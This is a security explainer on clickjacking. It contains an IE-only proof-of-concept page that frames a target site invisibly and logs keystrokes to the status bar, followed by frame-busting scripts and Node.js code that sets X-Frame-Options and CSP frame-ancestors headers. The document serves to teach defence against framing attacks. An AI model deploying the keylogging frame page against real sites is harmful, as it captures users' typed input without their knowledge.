Clickjacking

Clickjacking is a vulnerability where pages with sensitive functionality are placed in an invisible IFRAME that overlays seemingly innocuous content. By enticing the user to click various buttons in the innocuous content, the attacker can get victims to click buttons that perform sensitive functionality. Because the victim is actually interacting with the application through the hidden frame, the victim's cookies containing the session identifier are sent with each request. If the victim is already authenticated, any authenticated functionality is reachable this way.

Steps to reproduce:
1. Open the HTML file below in an IE browser, changing the IFRAME target to a web page with form input.

<html>
<head>
<title>Clickjacking</title>
<script>
// Keystroke logger: appends each key the outer page receives to a string
// shown in the status bar. window.event and keyCode are IE-specific, which
// is why the steps call for an IE browser.
var keylog = 'Entered text: ';
function keypress() {
keylog = keylog + String.fromCharCode(window.event.keyCode);
window.status = keylog;
}
</script>
</head>
<!-- The body keeps focus so that keypresses keep reaching the logger above -->
<body style="margin: 0; padding: 0"
onKeyPress="keypress()"
onLoad="this.focus()"
onBlur="this.focus()">
<div style="padding: 10px; border-bottom: 1px solid red; color: red;">
(see typed words in your status bar)
</div>
<!-- The target page is loaded in a borderless IFRAME filling the rest of the window;
     security="Restricted" is an IE-only attribute that puts the frame in the Restricted Sites zone -->
<iframe src="https://www.somesite.com/"
width="100%" height="90%" padding="0"
margin="0" frameborder="0" security="Restricted">
</iframe>
</body>
</html>

2. Enter text in any input field and observe that, even though the page is hosted in an IFRAME, the text you entered is echoed back in the status bar. Creepy!

Pages that include form input need to prevent other pages from framing them in IFRAMEs and stealing keypresses. The following JavaScript can be used to "break out" of any frames and ensure that the site is loaded in the top window and not in any frame controlled by the attacker.

// Each line below is an equivalent check: if this window is not the top-level
// window, navigate the top-level window to this page's own URL. Any one of them
// is sufficient on its own.
if (top != self) top.location.href = self.document.location;
if (parent != self) top.location.href = location.href;
if (top.frames.length != 0) top.location = self.document.location;
if (window != window.top) top.location.href = location.href;
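The one-line frame-busters above only work when the attacker's page cannot interfere with the navigation to top, and a framing page can interfere (for example by cancelling the navigation from the outer window), so they should be treated as a fallback rather than the primary control. The reliable control is a response header: X-Frame-Options (DENY or SAMEORIGIN) and the Content-Security-Policy frame-ancestors directive, which the browser enforces before any script on the page runs. The following Node.js code is an added example and is not from the original post: it builds those headers for a page with form input and pairs them with a frame-busting snippet that keeps the page hidden until it has confirmed it is top-level, so a blocked navigation leaves the attacker with a blank frame instead of a usable one. The page markup, the "Account settings" title and the partner origin in the comments are constructed placeholders.

```javascript
// Added example, not code from the original post: two layers of defense against
// framing, written for Node.js. The form markup and titles are constructed placeholders.

// Layer 1: response headers. A browser that honours them never renders the page
// inside a frame the policy forbids, so no script on the page is needed for this.
function antiFramingHeaders(allowedAncestors = []) {
  // allowedAncestors: origins permitted to embed the page, e.g. ["'self'"] or
  // ["https://partner.example"] (placeholder); empty means nobody may frame it.
  const headers = {
    'Content-Security-Policy':
      'frame-ancestors ' + (allowedAncestors.length ? allowedAncestors.join(' ') : "'none'"),
  };
  // X-Frame-Options can only express DENY or SAMEORIGIN, so it is added for those two
  // cases (older browsers) and omitted when other origins are allowed, where CSP alone applies.
  if (allowedAncestors.length === 0) {
    headers['X-Frame-Options'] = 'DENY';
  } else if (allowedAncestors.length === 1 && allowedAncestors[0] === "'self'") {
    headers['X-Frame-Options'] = 'SAMEORIGIN';
  }
  return headers;
}

// Layer 2: a frame-busting snippet for browsers that ignore the headers. Unlike the
// one-line variants, it hides the page by default and reveals it only after confirming
// the window is top-level, so blocking the navigation to top yields a blank frame.
function frameBustingSnippet() {
  return [
    '<style id="antiClickjack">body { display: none !important; }</style>',
    '<script>',
    '  if (self === top) {',
    '    var s = document.getElementById("antiClickjack");',
    '    s.parentNode.removeChild(s);',
    '  } else {',
    '    top.location = self.location;',
    '  }',
    '</script>',
  ].join('\n');
}

// The decision the snippet makes, factored out so it can be exercised without a browser.
// `win` is a window object or a stand-in exposing `self` and `top`.
function isTopLevel(win) {
  try {
    return win.self === win.top;
  } catch (e) {
    // Some browsers throw on cross-origin window access; treat that as "framed".
    return false;
  }
}

// A page with form input (constructed placeholder content) carrying layer 2 in its head.
function renderProtectedPage(title) {
  return [
    '<!DOCTYPE html>',
    '<html><head><title>' + title + '</title>',
    frameBustingSnippet(),
    '</head><body>',
    '<form method="post" action="/settings">',
    '  <label>New email <input name="email"></label>',
    '  <button>Save</button>',
    '</form>',
    '</body></html>',
  ].join('\n');
}

// Full response: headers from layer 1, markup carrying layer 2. Wire it to Node's
// built-in http module like so:
//   http.createServer((req, res) => {
//     const r = protectedResponse('Account settings');
//     res.writeHead(r.status, r.headers);
//     res.end(r.body);
//   }).listen(8080);
function protectedResponse(title, allowedAncestors = []) {
  return {
    status: 200,
    headers: Object.assign(
      { 'Content-Type': 'text/html; charset=utf-8' },
      antiFramingHeaders(allowedAncestors)
    ),
    body: renderProtectedPage(title),
  };
}
```

Calling `protectedResponse('Account settings')` produces a response with `X-Frame-Options: DENY` and `Content-Security-Policy: frame-ancestors 'none'`; passing `["'self'"]` switches to SAMEORIGIN, and passing any other origin drops X-Frame-Options and relies on frame-ancestors alone, since the older header cannot express that case.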
